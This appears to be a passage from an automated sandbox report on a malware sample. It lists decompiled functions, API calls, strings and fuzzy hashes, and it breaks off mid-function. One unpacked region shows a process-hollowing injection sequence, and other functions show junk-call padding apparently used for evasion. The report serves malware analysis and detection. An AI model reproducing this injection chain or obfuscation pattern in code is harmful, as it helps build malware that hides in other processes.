Opcode Fuzzy Hash: 6da46279e15f9b1820cb361b9289847db53e4abe8cb06125514456919f854b0b
Instruction Fuzzy Hash: 6F428AB5A01358DFCB24CFAADA896CEBBB4FF15354F504059F949AB610C7348A81CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00520110 Relevance: 22.7, APIs: 15, Instructions: 248
memorynativethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 00520156
GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0052016C
CreateProcessA.KERNELBASE(?,00000000), ref: 00520255
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00520270
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00520283
GetThreadContext.KERNELBASE(00000000,?), ref: 0052029F
ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 005202C8
NtUnmapViewOfSection.NTDLL(00000000,?), ref: 005202E3
VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 00520304
NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0052032A
NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 00520399
WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 005203BF
SetThreadContext.KERNELBASE(00000000,?), ref: 005203E1
ResumeThread.KERNELBASE(00000000), ref: 005203ED
ExitProcess.KERNEL32(00000000), ref: 00520412

Memory Dump Source

Source File: 00000000.00000002.318494291.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_520000_ikNC1JE7rY.jbxd

Similarity

API ID: Virtual$MemoryProcess$AllocThreadWrite$Context$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
String ID:
API String ID: 2875986403-0
Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction ID: 16fb0d98dd878bbeeb9d7cb7a005029b67ea85e08b6f0721781d66b2b73a87fd
Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
Instruction Fuzzy Hash: 5EB1C774A00208AFDB44CF98C895F9EBBB5FF88314F248158E509AB391D771AE41CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00520420 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 00520533

Strings

d, xrefs: 00520584
saodkfnosa9uin, xrefs: 005204DA
0, xrefs: 00520492
mfoaskdfnoa, xrefs: 00520520, 00520523

Memory Dump Source

Source File: 00000000.00000002.318494291.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_520000_ikNC1JE7rY.jbxd

Similarity

API ID: CreateWindow
String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
API String ID: 716092398-2341455598
Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction ID: 86d41963ede0ad6dd6a04df42b1a8a11e8183a0b0678abafadcb9ca2c5ff6471
Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
Instruction Fuzzy Hash: BF511A70E08398DAEB11CBD8D849BDDBFB2AF11708F144058E5447F2C6C3BA5658CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 005205B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesA.KERNELBASE(apfHQ), ref: 005205EC

Strings

o, xrefs: 00520600
apfHQ, xrefs: 005205E2, 005205E5

Memory Dump Source

Source File: 00000000.00000002.318494291.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_520000_ikNC1JE7rY.jbxd

Similarity

API ID: AttributesFile
String ID: apfHQ$o
API String ID: 3188754299-2999369273
Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction ID: 4942de725a6f44557a78a72e2acb9c8e3838b4480259882d8f0a91ab4d590745
Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
Instruction Fuzzy Hash: 44012170C0525CEEDF10DB98D5583AEBFB5AF41308F1480D9C4092B382D7B69B59CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0040D805 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040D805(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x42eb04 = _t6;
				if(_t6 != 0) {
					 *0x42f134 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x0040d81a
0x0040d820
0x0040d827
0x0040d82e
0x0040d834
0x0040d82a
0x0040d82a
0x0040d82a

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D81A

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 78e0852fdfc83d9da911a7fd24932acf738f4a1c18274fab87f3f58ae44aeb3f
Instruction ID: fd85ce2fcb67921a389e6ce4cb0a7bbe92cde3a7c9e0599c9ee6dbe1732e0889
Opcode Fuzzy Hash: 78e0852fdfc83d9da911a7fd24932acf738f4a1c18274fab87f3f58ae44aeb3f
Instruction Fuzzy Hash: BAD0A732A513049FDB10AFB1BD097323BDCD3847A5F408436B90DD61A0F574ED52C648

Uniqueness

Uniqueness Score: -1.00%

Function 00409D17 Relevance: 1.5, APIs: 1, Instructions: 4
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00409D17() {
				void* _t1;

				_t1 = E00409CA5(0); // executed
				return _t1;
			}

0x00409d19
0x00409d1f

APIs

__encode_pointer.LIBCMT ref: 00409D19

Part of subcall function 00409CA5: TlsGetValue.KERNEL32(00000000,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409CB7
Part of subcall function 00409CA5: TlsGetValue.KERNEL32(00000004,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409CCE
Part of subcall function 00409CA5: RtlEncodePointer.NTDLL(00000000,?,00409D1E,00000000,00412B23,0042E6E0,00000000,00000314,?,0040D11A,0042E6E0,Microsoft Visual C++ Runtime Library,00012010), ref: 00409D0C

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: Value$EncodePointer__encode_pointer
String ID:
API String ID: 2585649348-0
Opcode ID: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction ID: a16bc2a155c058482eeeff35459f6d4b366902e2d4f8f65c91ebe27a5e0a607d
Opcode Fuzzy Hash: 626ded885c0b6a47c33717e93208713095e5c780cda27b978e7e12efcbcc7c99
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004077DB Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E004077DB(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x42c770; // 0xa0fc40c5
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x42ec10 = _t6;
				 *0x42ec0c = _t22;
				 *0x42ec08 = _t25;
				 *0x42ec04 = _t21;
				 *0x42ec00 = _t27;
				 *0x42ebfc = _t26;
				 *0x42ec28 = ss;
				 *0x42ec1c = cs;
				 *0x42ebf8 = ds;
				 *0x42ebf4 = es;
				 *0x42ebf0 = fs;
				 *0x42ebec = gs;
				asm("pushfd");
				_pop( *0x42ec20);
				 *0x42ec14 =  *_t31;
				 *0x42ec18 = _v0;
				 *0x42ec24 =  &_a4;
				 *0x42eb60 = 0x10001;
				_t11 =  *0x42ec18; // 0x0
				 *0x42eb14 = _t11;
				 *0x42eb08 = 0xc0000409;
				 *0x42eb0c = 1;
				_t12 =  *0x42c770; // 0xa0fc40c5
				_v812 = _t12;
				_t13 =  *0x42c774; // 0x5f03bf3a
				_v808 = _t13;
				 *0x42eb58 = IsDebuggerPresent();
				_push(1);
				E00409C9D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x402814);
				if( *0x42eb58 == 0) {
					_push(1);
					E00409C9D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x004077db
0x004077db
0x004077db
0x004077db
0x004077db
0x004077db
0x004077db
0x004077e1
0x004077e3
0x004077e3
0x0040d8d6
0x0040d8db
0x0040d8e1
0x0040d8e7
0x0040d8ed
0x0040d8f3
0x0040d8f9
0x0040d900
0x0040d907
0x0040d90e
0x0040d915
0x0040d91c
0x0040d923
0x0040d924
0x0040d92d
0x0040d935
0x0040d93d
0x0040d948
0x0040d952
0x0040d957
0x0040d95c
0x0040d966
0x0040d970
0x0040d975
0x0040d97b
0x0040d980
0x0040d98c
0x0040d991
0x0040d993
0x0040d99b
0x0040d9a6
0x0040d9b3
0x0040d9b5
0x0040d9b7
0x0040d9bc
0x0040d9d0

APIs

IsDebuggerPresent.KERNEL32 ref: 0040D986
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040D99B
UnhandledExceptionFilter.KERNEL32(00402814), ref: 0040D9A6
GetCurrentProcess.KERNEL32(C0000409), ref: 0040D9C2
TerminateProcess.KERNEL32(00000000), ref: 0040D9C9

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 8da00cf6bddea286a34910294c1b5dc8e5d4418aa05d272ec117f2756566304b
Instruction ID: fe692e2c2471a191408ecafd0a3b7612e04458c4672b6b453b9975c369e636a9
Opcode Fuzzy Hash: 8da00cf6bddea286a34910294c1b5dc8e5d4418aa05d272ec117f2756566304b
Instruction Fuzzy Hash: 39210775A04244CFD720DFA7EE49A443BE0FB08310F90443AE50AA72B1DBB46986CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0040FBC1 Relevance: 1.7, APIs: 1, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E0040FBC1(void* __ebx, void* __ecx, void* __edi) {
				void* _t180;
				void* _t183;
				void* _t236;

				_t236 = __edi;
				_t183 = __ecx;
				_t180 = __ebx;
				_push(cs);
			}

0x0040fbc1
0x0040fbc1
0x0040fbc1
0x0040fbc1

APIs

RaiseException.KERNEL32(C0000091,00000000,?,?), ref: 0040FD9B

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 79006d2fe9c26dff72dc47bcb9a31a88823a34dc8838945c28cb2945f7c2870a
Instruction ID: cae0dfbe6e4335d19a8148cd79cde4b968717617931abf2d66b64ead8208cd3c
Opcode Fuzzy Hash: 79006d2fe9c26dff72dc47bcb9a31a88823a34dc8838945c28cb2945f7c2870a
Instruction Fuzzy Hash: 3CA19B31110609CFD728CF18C496A657BA0FF44354F2586BEE99B9F2E1C738E995CB88

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC65 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040CC65() {

				SetUnhandledExceptionFilter(E0040CC23);
				return 0;
			}

0x0040cc6a
0x0040cc72

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000CC23), ref: 0040CC6A

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 8a9668a121bb6271092156a840b57e56a2786df9fe65fee17d7729fe436932e7
Instruction ID: 2ae0edce1fd270ac90234cf03210fdf1cd3bd5e5e37b8ca74bc146a0eddefa53
Opcode Fuzzy Hash: 8a9668a121bb6271092156a840b57e56a2786df9fe65fee17d7729fe436932e7
Instruction Fuzzy Hash: A69002706555818AE60017719D4D60535956A58B46F5509717049E44B8DE7840415519

Uniqueness

Uniqueness Score: -1.00%

Function 00520042 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.318494291.0000000000520000.00000040.00001000.00020000.00000000.sdmp, Offset: 00520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_520000_ikNC1JE7rY.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 20df88512b343b647615cb62515e99efdca8ba47d32269c00433d2079c688b67
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: D3119E723411109FE714CE65EC95FA277EAFF89320B298055E908CB392D675E801C760

Uniqueness

Uniqueness Score: -1.00%

Function 0040573C Relevance: 31.6, APIs: 13, Strings: 5, Instructions: 93
memoryfilelibraryCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040573C(void* __ecx, unsigned int __edx, intOrPtr _a4) {
				void* _v6;
				struct _COORD _v8;
				unsigned int _v12;
				long _v16;
				long _v20;
				struct _INPUT_RECORD _v40;
				char _v1064;
				short _v3112;
				short _v5160;
				void* _t15;
				void* _t16;
				void* _t37;
				unsigned int _t42;

				_t15 = E00406B10(0x1424);
				_t42 = __edx >> 3;
				if(_t42 > 0) {
					_t37 = __ecx;
					_v12 = _t42;
					do {
						if( *0x42e644 == 0x5d) {
							GlobalGetAtomNameA(0,  &_v1064, 0);
							PeekConsoleInputW(0,  &_v40, 0,  &_v20);
							GetPrivateProfileStringW(0, 0, 0, 0, 0, 0);
							GetShortPathNameW(L"rawurumuxe",  &_v3112, 0);
							__imp__GetConsoleAliasA(0, 0, 0, 0);
							_v8.X = 0;
							asm("stosw");
							WriteConsoleOutputCharacterW(0, L"yetuzohapimupukugegisufaxinu", 0, _v8,  &_v16);
							VirtualAlloc(0, 0, 0, 0);
							SearchPathA("kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu", "lohulomazuvepupanezewevewimafof", 0, 0, 0, 0);
							DeleteFileW(0);
							LoadLibraryW(L"genibutozetinoyegazuzatozes");
							IsBadCodePtr(0);
							GetModuleFileNameW(0,  &_v5160, 0);
							EnumResourceTypesA(0, 0, 0);
						}
						_t16 = E00405599(_t37, _a4, 0);
						_t37 = _t37 + 8;
						_t12 =  &_v12;
						 *_t12 = _v12 - 1;
					} while ( *_t12 != 0);
					return _t16;
				}
				return _t15;
			}

0x00405744
0x0040574a
0x00405751
0x00405759
0x0040575b
0x0040575e
0x00405765
0x00405774
0x00405784
0x00405790
0x004057a3
0x004057ad
0x004057b5
0x004057bc
0x004057cc
0x004057d6
0x004057ea
0x004057f1
0x004057fc
0x00405803
0x00405812
0x0040581b
0x0040581b
0x00405826
0x0040582b
0x0040582e
0x0040582e
0x0040582e
0x00000000
0x00405838
0x0040583b

APIs

GlobalGetAtomNameA.KERNEL32 ref: 00405774
PeekConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00405784
GetPrivateProfileStringW.KERNEL32 ref: 00405790
GetShortPathNameW.KERNEL32 ref: 004057A3
GetConsoleAliasA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004057AD
WriteConsoleOutputCharacterW.KERNEL32(00000000,yetuzohapimupukugegisufaxinu,00000000,?,?), ref: 004057CC
VirtualAlloc.KERNEL32(00000000,00000000,00000000,00000000), ref: 004057D6
SearchPathA.KERNEL32(kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu,lohulomazuvepupanezewevewimafof,00000000,00000000,00000000,00000000), ref: 004057EA
DeleteFileW.KERNEL32(00000000), ref: 004057F1
LoadLibraryW.KERNEL32(genibutozetinoyegazuzatozes), ref: 004057FC
IsBadCodePtr.KERNEL32 ref: 00405803
GetModuleFileNameW.KERNEL32(00000000,?,00000000), ref: 00405812
EnumResourceTypesA.KERNEL32 ref: 0040581B

Strings

yetuzohapimupukugegisufaxinu, xrefs: 004057C6
lohulomazuvepupanezewevewimafof, xrefs: 004057E0
kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu, xrefs: 004057E5
rawurumuxe, xrefs: 0040579E
genibutozetinoyegazuzatozes, xrefs: 004057F7

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: ConsoleName$FilePath$AliasAllocAtomCharacterCodeDeleteEnumGlobalInputLibraryLoadModuleOutputPeekPrivateProfileResourceSearchShortStringTypesVirtualWrite
String ID: genibutozetinoyegazuzatozes$kuwedefujemopebejiyazehomibifotidefemagojacorijivarezu$lohulomazuvepupanezewevewimafof$rawurumuxe$yetuzohapimupukugegisufaxinu
API String ID: 2519718940-461694913
Opcode ID: 3fc17d3ef87a26bd9527d09502b50ade4ad27fe49354167098c5c79adbe6f2c5
Instruction ID: b0c5818164c8b2c279455538c364471d95fd1b1af7f0e09314901615d566d303
Opcode Fuzzy Hash: 3fc17d3ef87a26bd9527d09502b50ade4ad27fe49354167098c5c79adbe6f2c5
Instruction Fuzzy Hash: 68212872502524BBC711AB919E48CDF7F7CEF4A3917004076F64AF1461C6385685CBB9

Uniqueness

Uniqueness Score: -1.00%

Function 00409E0C Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 92%

			E00409E0C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t23;
				intOrPtr _t28;
				intOrPtr _t32;
				intOrPtr _t45;
				void* _t46;

				_t35 = __ebx;
				_push(0xc);
				_push(0x417988);
				E0040C128(__ebx, __edi, __esi);
				_t44 = L"KERNEL32.DLL";
				_t23 = GetModuleHandleW(L"KERNEL32.DLL");
				if(_t23 == 0) {
					_t23 = E0040CC73(_t44);
				}
				 *(_t46 - 0x1c) = _t23;
				_t45 =  *((intOrPtr*)(_t46 + 8));
				 *((intOrPtr*)(_t45 + 0x5c)) = 0x402798;
				 *((intOrPtr*)(_t45 + 0x14)) = 1;
				if(_t23 != 0) {
					_t35 = GetProcAddress;
					 *((intOrPtr*)(_t45 + 0x1f8)) = GetProcAddress(_t23, "EncodePointer");
					 *((intOrPtr*)(_t45 + 0x1fc)) = GetProcAddress( *(_t46 - 0x1c), "DecodePointer");
				}
				 *((intOrPtr*)(_t45 + 0x70)) = 1;
				 *((char*)(_t45 + 0xc8)) = 0x43;
				 *((char*)(_t45 + 0x14b)) = 0x43;
				 *(_t45 + 0x68) = 0x42cc70;
				E0040DB4D(_t35, 1, 0xd);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				InterlockedIncrement( *(_t45 + 0x68));
				 *(_t46 - 4) = 0xfffffffe;
				E00409EE1();
				E0040DB4D(_t35, 1, 0xc);
				 *(_t46 - 4) = 1;
				_t28 =  *((intOrPtr*)(_t46 + 0xc));
				 *((intOrPtr*)(_t45 + 0x6c)) = _t28;
				if(_t28 == 0) {
					_t32 =  *0x42d278; // 0x42d1a0
					 *((intOrPtr*)(_t45 + 0x6c)) = _t32;
				}
				E0040F2F9( *((intOrPtr*)(_t45 + 0x6c)));
				 *(_t46 - 4) = 0xfffffffe;
				return E0040C16D(E00409EEA());
			}

0x00409e0c
0x00409e0c
0x00409e0e
0x00409e13
0x00409e18
0x00409e1e
0x00409e26
0x00409e29
0x00409e2e
0x00409e2f
0x00409e32
0x00409e35
0x00409e3f
0x00409e44
0x00409e4c
0x00409e54
0x00409e64
0x00409e64
0x00409e6a
0x00409e6d
0x00409e74
0x00409e7b
0x00409e84
0x00409e8a
0x00409e91
0x00409e97
0x00409e9e
0x00409ea5
0x00409eab
0x00409eae
0x00409eb1
0x00409eb6
0x00409eb8
0x00409ebd
0x00409ebd
0x00409ec3
0x00409ec9
0x00409eda

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00417988,0000000C,00409F47,00000000,00000000), ref: 00409E1E
__crt_waiting_on_module_handle.LIBCMT ref: 00409E29

Part of subcall function 0040CC73: Sleep.KERNEL32(000003E8,00000000,?,00409D6F,KERNEL32.DLL,?,00409DBB), ref: 0040CC7F
Part of subcall function 0040CC73: GetModuleHandleW.KERNEL32(?,?,00409D6F,KERNEL32.DLL,?,00409DBB), ref: 0040CC88

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00409E52
GetProcAddress.KERNEL32(?,DecodePointer), ref: 00409E62
__lock.LIBCMT ref: 00409E84
InterlockedIncrement.KERNEL32(0042CC70), ref: 00409E91
__lock.LIBCMT ref: 00409EA5
___addlocaleref.LIBCMT ref: 00409EC3

Strings

EncodePointer, xrefs: 00409E46
KERNEL32.DLL, xrefs: 00409E18, 00409E1D, 00409E28
DecodePointer, xrefs: 00409E5A

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 19fa72d377f5044f2c7b99e85f3687d38c5caa43142daeb877be5a9b347a4f55
Instruction ID: 6ad4f0a12971139d9532a4c3a171173a4d2e78e68cd5d816e784cf29c2ced9c8
Opcode Fuzzy Hash: 19fa72d377f5044f2c7b99e85f3687d38c5caa43142daeb877be5a9b347a4f55
Instruction Fuzzy Hash: FC116D71940701DAE720EF76D945B5ABBE0AF05314F10453EE499B62E1CB78A940CF5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040563B Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 107pipetimeCOMMON

Download Yara Rule

APIs

SetVolumeMountPointA.KERNEL32(00000000,00000000), ref: 0040563B
WaitNamedPipeW.KERNEL32(luhovire,00000000), ref: 00405685
ReadConsoleInputW.KERNEL32(00000000,?,00000000,?), ref: 00405695
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040569F
OpenWaitableTimerA.KERNEL32(00000000,00000000,Camivanihaza dulaxow), ref: 004056AC
InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 004056B8

Strings

luhovire, xrefs: 00405680
Camivanihaza dulaxow, xrefs: 004056A5

Memory Dump Source

Source File: 00000000.00000002.318427767.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.318424092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318441517.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318453842.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.318459680.0000000000431000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ikNC1JE7rY.jbxd

Similarity

API ID: CompareConsoleCreateEventExchangeInputInterlockedMountNamedOpenPipePointReadTimerVolumeWaitWaitable
String ID: Camivanihaza dulaxow$luhovire
API String ID: 3983037427-2293185549
Opcode ID: d3a469461aef5e26fc3832222cb2ccab869ff6751ee0bcdcd3b5976dfb60caf6
Instruction ID: e0417459ce5708b3d2944c1299cadaac4ca3c3044ba0b9f4daa45e8deca22c17
Opcode Fuzzy Hash: d3a469461aef5e26fc3832222cb2ccab869ff6751ee0bcdcd3b5976dfb60caf6
Instruction Fuzzy Hash: EA41C3B1E01219EFCB50CFA9DA899DEBBB4FF19314F50406AE515F2250D3349A41CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406429 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00406429(void* __eflags) {
				char _v2048;
				intOrPtr _t2;
				short _t4;
				short _t5;
				short _t7;
				short _t8;
				short _t9;
				short _t10;
				short _t11;
				short _t12;
				short _t13;
				short _t14;
				intOrPtr* _t21;
				void* _t24;
				void* _t32;

				_t2 =  *0x41c7ac; // 0xfff5ca55
				 *0x42e644 = _t2;
				 *0x42e644 =  *0x42e644 + 0xb2d3b;
				_t4 = 0x6e;
				 *0x42dcde = _t4;
				_t5 = 0x33;
				 *0x42dce4 = _t5;
				 *0x42dcf0 = 0;
				_t7 = 0x2e;
				 *0x42dce8 = _t7;
				_t8 = 0x6b;
				 *0x42dcd8 = _t8;
				_t9 = 0x6c;
